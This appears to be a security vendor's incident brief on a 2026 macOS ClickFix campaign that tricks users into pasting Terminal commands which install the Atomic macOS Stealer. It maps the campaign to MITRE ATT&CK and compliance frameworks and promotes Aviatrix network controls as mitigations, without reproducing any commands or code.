New macOS ClickFix Attack Silently Mounts DMGs to Deploy Infostealer
Executive Summary
In June 2026, a new macOS ClickFix campaign emerged, utilizing Terminal commands to silently download, mount, and execute info-stealing malware from malicious disk image (DMG) files. This attack infects Mac devices with the Atomic macOS Stealer (AMOS), which exfiltrates browser credentials, cryptocurrency wallet data, Keychain information, messaging app data, and user documents. The campaign begins with a fake CAPTCHA page instructing users to open Terminal and paste a malicious command, leading to the automatic execution of the malware. This method represents an evolution in ClickFix attacks, combining social engineering with automated malware deployment to enhance stealth and effectiveness.
The significance of this incident lies in the increasing sophistication of social engineering attacks targeting macOS users. By leveraging trusted system utilities and deceptive prompts, attackers can bypass traditional security measures and user vigilance. This trend underscores the need for enhanced user education, robust endpoint protection, and continuous monitoring to detect and mitigate such evolving threats.
Why This Matters Now
The emergence of this sophisticated ClickFix campaign highlights the evolving tactics of cybercriminals targeting macOS users. As attackers refine their methods to exploit user trust and system functionalities, it is imperative for organizations and individuals to stay vigilant, update security protocols, and educate users on recognizing and avoiding such deceptive techniques.
Attack Path Analysis
The attack began with a social engineering tactic where users were tricked into executing malicious commands in the macOS Terminal, leading to the download and execution of the Atomic macOS Stealer (AMOS) malware. Upon execution, AMOS gained unauthorized access to sensitive system areas, escalating its privileges to extract confidential data. The malware then moved laterally within the system, accessing various applications and data repositories. It established a command and control channel to communicate with the attacker's server, facilitating data exfiltration. Subsequently, AMOS exfiltrated stolen data, including browser credentials, cryptocurrency wallets, and Keychain information, to the attacker's server. The impact of the attack was significant, resulting in the compromise of sensitive user data and potential financial loss.
Kill Chain Progression
Initial Compromise
Description
Users were deceived into executing malicious commands in the macOS Terminal, leading to the download and execution of the AMOS malware.
MITRE ATT&CK® Techniques
User Execution: Malicious Copy and Paste
Command and Scripting Interpreter: Unix Shell
Phishing: Spearphishing Link
Application Layer Protocol: Web Protocols
File and Directory Discovery
Credentials from Password Stores: Keychain
Screen Capture
Exfiltration Over C2 Channel
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – User Training and Awareness
Control ID: Identity
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
macOS ClickFix infostealer targeting cryptocurrency wallets, browser credentials, and payment data poses severe risk to financial institutions and client assets.
Information Technology/IT
IT sector faces elevated risk from Terminal-based social engineering attacks exploiting privileged access to steal credentials and compromise development environments.
Computer Software/Engineering
Software companies vulnerable to AMOS stealer targeting browser data, authentication tokens, and development credentials through deceptive CAPTCHA verification techniques.
Cryptocurrencies
Cryptocurrency sector severely impacted by targeted wallet theft including Exodus, Electrum, and malicious replacement of Ledger Live and Trezor Suite applications.
Sources
- New macOS ClickFix attack silently mounts DMGs to push infostealerhttps://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/Verified
- Why AMOS matters: The macOS malware stealing data at scalehttps://www.sophos.com/en-us/blog/why-amos-matters-the-macos-malware-stealing-data-at-scaleVerified
- Atomic Stealer MacOS ClickFix Attack Bypasses Apple Security Warningshttps://www.infosecurity-magazine.com/news/atomic-stealer-macos-clickfix/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the malware's ability to escalate privileges, move laterally, and exfiltrate data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: While Aviatrix CNSF may not prevent the initial execution of malicious commands, it could limit the malware's ability to communicate with external servers, reducing the risk of further compromise.
Control: Zero Trust Segmentation
Mitigation: Aviatrix Zero Trust Segmentation could likely limit the malware's ability to access sensitive system areas by enforcing strict access controls, thereby reducing the scope of privilege escalation.
Control: East-West Traffic Security
Mitigation: Aviatrix East-West Traffic Security could likely constrain the malware's ability to move laterally within the system by enforcing strict segmentation policies, thereby reducing the attacker's reach.
Control: Multicloud Visibility & Control
Mitigation: Aviatrix Multicloud Visibility & Control could likely detect and limit unauthorized outbound communications, thereby reducing the effectiveness of command and control channels.
Control: Egress Security & Policy Enforcement
Mitigation: Aviatrix Egress Security & Policy Enforcement could likely limit the malware's ability to exfiltrate data by enforcing strict outbound traffic controls, thereby reducing data loss.
While Aviatrix CNSF may not prevent the initial compromise, it could likely limit the overall impact by reducing the attacker's ability to escalate privileges, move laterally, and exfiltrate data.
Impact at a Glance
Affected Business Functions
- User Authentication
- Data Security
- System Integrity
Estimated downtime: N/A
Estimated loss: N/A
Potential exposure of user credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict unauthorized access and limit lateral movement within the system.
- • Deploy Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing unauthorized data exfiltration.
- • Utilize Threat Detection & Anomaly Response systems to identify and respond to unusual activities indicative of malware presence.
- • Enforce Multicloud Visibility & Control to maintain comprehensive oversight of network activities across all platforms.
- • Educate users on the risks of executing unverified commands and the importance of adhering to security protocols.
